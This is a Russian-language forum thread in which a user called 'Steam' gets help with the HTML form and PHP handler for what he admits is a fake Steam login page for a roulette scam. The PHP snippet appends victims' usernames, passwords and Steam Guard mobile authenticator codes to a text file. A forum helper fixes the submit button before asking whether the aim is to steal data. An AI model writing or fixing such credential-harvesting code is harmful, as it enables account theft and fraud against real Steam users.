Loading...
Помощь по скриптам | Поля ввода перехват
PhpStorm (24.03.2018 в 14:55)
Steam (24.03.2018 в 14:51)
PhpStorm , На лови что у меня, ты поймешь что это писец ааахаха)

я не пользуюсь RAR-ом

Это не тоже самое? Архив как архив. Зип, рар, 7z. Все расспакуется.
OZZY (24.03.2018 в 15:12)
PhpStorm (24.03.2018 в 14:55)
Steam (24.03.2018 в 14:51)
PhpStorm , На лови что у меня, ты поймешь что это писец ааахаха)

я не пользуюсь RAR-ом

Это не тоже самое? Архив как архив. Зип, рар, 7z. Все расспакуется.

У меня в ОС встроенный zip, зачем мне устанавливать сторонние архиваторы? Потому что кто-то не знает, что zip есть в ОС по умолчанию и установил себе какой-то RAR? :-D

Залей на хост БД в формате RAR.
PhpStorm , шо ты мелишь.
OZZY (24.03.2018 в 15:20)
PhpStorm , шо ты мелишь.

я поясняю, что мне не нужен сторонний архиватор, если в ОС есть встроенный
PhpStorm , Натянул убрал с твоего <button>Отправить</button> не работает <input class="btn_green_white_innerfade" type="button" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" onclick="checkFields();" value="Войти"> нужно к этому
Steam (24.03.2018 в 15:31)
PhpStorm , Натянул убрал с твоего <button>Отправить</button> не работает <input class="btn_green_white_innerfade" type="button" id="imageLogin" style="width:104px; height:34px; border:none; font-size: 15px;" onclick="checkFields();" value="Войти"> нужно к этому

тег <button> по умолчанию имеет тип submit, мы же обрабатываем отправку данных из формы - это событие submit

пробуй так

<button class="btn_green_white_innerfade" style="width:104px; height:34px; border:none; font-size: 15px;">Войти</button>
PhpStorm , Работает, но теперь смотри на кнопку войти вызвалось окно через он клик для ввода аунтефикатора, добавил
<?php
if (filter_has_var(INPUT_POST, 'do')) {
$file = fopen('base.txt', 'a');
fputs($file, 'Имя: ' . $_POST['username'] . ' || Пароль: ' . $_POST['password'] . ' || Гуард: ' . $_POST['guard'] . PHP_EOL);
fclose($file);
}

И не работает
Steam (24.03.2018 в 15:49)
PhpStorm , Работает, но теперь смотри на кнопку войти вызвалось окно через он клик для ввода аунтефикатора, добавил
<?php
if (filter_has_var(INPUT_POST, 'do')) {
$file = fopen('base.txt', 'a');
fputs($file, 'Имя: ' . $_POST['username'] . ' || Пароль: ' . $_POST['password'] . ' || Гуард: ' . $_POST['guard'] . PHP_EOL);
fclose($file);
}

И не работает

так а что ты хочешь сделать, стырить инфу и чтобы одновременно человек залогинился в стороннем сервисе?
PhpStorm , Стим знаешь, вот для стима скам, рулетка потом идет эта фейк авторизация через стим вводишь логин и пароль, далее нажимаешь войти просят ввести мобильный аунтефикатор вводишь и все данные мне идут
PhpStorm , А можно эту форм хрен знает откуда открыть и в конце закрыть вместе <input type="hidden" name="do"> ибо там хтм здоровый
Онлайн: 2
Время:
Gen. 0.0789
(c) Bym.Guru 2010-2026